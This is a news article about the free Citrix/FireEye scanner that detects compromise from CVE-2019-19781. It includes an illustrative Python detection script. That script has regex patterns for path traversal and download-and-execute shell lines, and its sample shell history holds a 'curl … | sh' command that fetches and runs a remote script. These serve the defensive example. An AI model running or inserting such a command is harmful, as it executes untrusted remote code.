Citrix and FireEye release free scanner to detect breached Citrix appliances

The Citrix/FireEye tool can identify systems compromised by CVE-2019-19781 exploits

Citrix, in collaboration with FireEye, has released a free tool that Citrix customers can use to assess their risk of compromise from the recently publicised critical security flaws.

This Indicator of Compromise (IoC) scanner is available free of charge under the Apache 2.0 open source licence, according to Citrix, and will help customers identify Citrix Application Delivery Controller (ADC), Citrix Gateway, and Citrix SD-WAN WANOP appliances already compromised under the CVE-2019-19781 security vulnerability.

The company said that Citrix customers should use the tool to scan their Citrix instances locally, one appliance at a time. The tool will examine available log sources and other forensic artefacts to provide an assessment of potential compromise detected on the system.

The tool is freely available in both the Citrix and FireEye GitHub repositories.

"Citrix is deeply committed to the security of our products and services, and we are making every effort to ensure all customers are supported in response to CVE-2019-19781," said Citrix CISO Fermin J. Serna.

He recommended all Citrix customers run the tool as soon as possible.

We are committed to the security of our products & we are making every effort to ensure all customers are supported in response to #CVE2019-19781. To that end, we have teamed up with @FireEye on a scanner that aids customers in the detection of compromise. https://t.co/Nk8xO95fVv

— Citrix (@citrix) January 22, 2020

The new tool is compatible with the following products:

It is capable of identifying file system paths of various known malware; analysing webserver log entries to indicate successful exploitation; reviewing post-exploitation activity in shell history; and detecting unexpected changes in NetScaler directories, unexpected processes, and ports used by known malware.
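The checks listed above are the shape of a typical appliance IoC scanner: parse each local artefact, match it against a set of indicators, and report what matched. The script below is an added illustration of that structure and is not the Citrix/FireEye tool or any of its code; every indicator value, path, port baseline and log line in it is a constructed placeholder (the real scanner ships its own indicator set), so the logic, not the values, is what the example shows.

```python
import re
from dataclasses import dataclass

# All indicator values below are constructed placeholders for this example; the
# real Citrix/FireEye scanner ships its own indicator set.
SUSPICIOUS_URI_PATTERNS = [
    re.compile(r"/\.\./"),                              # path traversal in the request URI
    re.compile(r"/placeholder/webshell\.pl$"),          # placeholder webshell path
]
SUSPICIOUS_SHELL_PATTERNS = [
    re.compile(r"\b(wget|curl)\b.*\|\s*(sh|bash)\b"),  # download-and-execute one-liner
]
KNOWN_MALWARE_PATHS = {
    "/placeholder/known-malware/miner",
    "/placeholder/known-malware/webshell.pl",
}
EXPECTED_LISTENING_PORTS = {22, 80, 443}                # constructed baseline for the appliance

# Apache/NGINX combined-log style line: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+)[^"]*" (?P<status>\d{3})'
)


@dataclass
class Finding:
    source: str   # which artefact produced the finding
    detail: str   # human-readable description


def scan_web_log(lines):
    """Flag requests whose URI matches an indicator; a 200 suggests the request succeeded."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                                  # skip lines that do not parse
        uri, status = m["uri"], int(m["status"])
        if any(p.search(uri) for p in SUSPICIOUS_URI_PATTERNS):
            outcome = "likely successful" if status == 200 else "attempted"
            findings.append(Finding("web_log",
                                    f"{outcome}: {m['ip']} {m['method']} {uri} -> {status}"))
    return findings


def scan_shell_history(lines):
    """Look for post-exploitation activity recorded in shell history."""
    return [Finding("shell_history", line.strip())
            for line in lines
            if any(p.search(line) for p in SUSPICIOUS_SHELL_PATTERNS)]


def scan_paths(present_paths):
    """Report known-malware paths that exist on the file system."""
    return [Finding("filesystem", p)
            for p in sorted(KNOWN_MALWARE_PATHS & set(present_paths))]


def unexpected_ports(listening_ports):
    """Listening ports that are not in the expected baseline."""
    return set(listening_ports) - EXPECTED_LISTENING_PORTS


def run_scan(web_log, shell_history, present_paths, listening_ports):
    """Combine all artefact checks into one assessment for a single appliance."""
    findings = (scan_web_log(web_log)
                + scan_shell_history(shell_history)
                + scan_paths(present_paths))
    findings += [Finding("ports", f"unexpected listening port {p}")
                 for p in sorted(unexpected_ports(listening_ports))]
    return {"compromised": bool(findings), "findings": findings}


# Constructed sample artefacts (RFC 5737 documentation addresses, placeholder paths).
SAMPLE_WEB_LOG = [
    '203.0.113.5 - - [22/Jan/2020:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512',
    '203.0.113.9 - - [22/Jan/2020:10:00:02 +0000] "POST /app/../private/ HTTP/1.1" 200 0',
    '203.0.113.9 - - [22/Jan/2020:10:00:03 +0000] "GET /app/../private/ HTTP/1.1" 404 0',
    'garbage line that should be skipped',
]
SAMPLE_SHELL_HISTORY = ["ls -la", "curl http://203.0.113.77/x.sh | sh", "cat /var/log/httpd/access.log"]
SAMPLE_PRESENT_PATHS = {"/etc/passwd", "/placeholder/known-malware/miner"}
SAMPLE_LISTENING_PORTS = {22, 443, 4444}

if __name__ == "__main__":
    report = run_scan(SAMPLE_WEB_LOG, SAMPLE_SHELL_HISTORY, SAMPLE_PRESENT_PATHS, SAMPLE_LISTENING_PORTS)
    print("compromised:", report["compromised"])
    for f in report["findings"]:
        print(f"[{f.source}] {f.detail}")
```

Two design points carry over to the real tool's use: the scan runs against artefacts collected from one appliance at a time, and a web-log hit is graded by response status, since an attempted request against an unpatched appliance and a request that returned 200 are very different findings for the incident responder.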

Serna said that Citrix's security team is currently scanning the internet to identify customers who are vulnerable to the flaw but have not yet applied the recommended mitigations or installed the patches Citrix has issued so far.

The company is contacting those customers individually and encouraging them to apply the mitigations right away.

On 19th January, Citrix finally released the first patches for the CVE-2019-19781 security vulnerability. However, permanent fixes were released only for ADC versions 11.1 and 12.0. The company also announced that permanent patches for the other versions would be released on 24th January.

According to security specialists, CVE-2019-19781 represents a serious threat. If exploited, it could enable an unauthenticated attacker to remotely access private network resources and execute arbitrary code.

The vulnerability affects Citrix Application Delivery Controller (ADC), Citrix Gateway, and Citrix SD-WAN WANOP appliances.

The bug was uncovered by Mikhail Klyuchnikov, a security researcher at Positive Technologies, in December, and was reported to Citrix in the same month.

At the time, Citrix released a set of risk mitigation measures for its customers, and promised to release permanent fixes before the end of January.

Earlier this month, researchers warned that they had spotted a number of threat actors scanning the internet in search of Citrix servers vulnerable to the flaw.